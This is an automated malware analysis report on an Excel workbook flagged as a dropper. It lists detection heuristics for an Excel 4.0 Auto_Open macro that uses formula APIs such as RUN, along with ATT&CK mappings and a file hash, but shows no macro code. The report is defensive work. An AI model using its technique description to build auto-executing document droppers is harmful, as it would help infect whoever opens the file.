MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code upon opening the workbook. Heuristics indicate the use of dangerous formula APIs like RUN, suggesting the macro is designed to download and execute a secondary payload. ClamAV detection further confirms its malicious nature as a dropper.
Heuristics (4)

- ClamAV: Xls.Dropper.Agent-7790690-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-7790690-0
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126577 bytes |

SHA-256: f5bb920c0340c4b869881a031442b7a920d19e19ccf85de3ace4354e5ce0df60

Preview script: first 1,000 lines of the extracted script.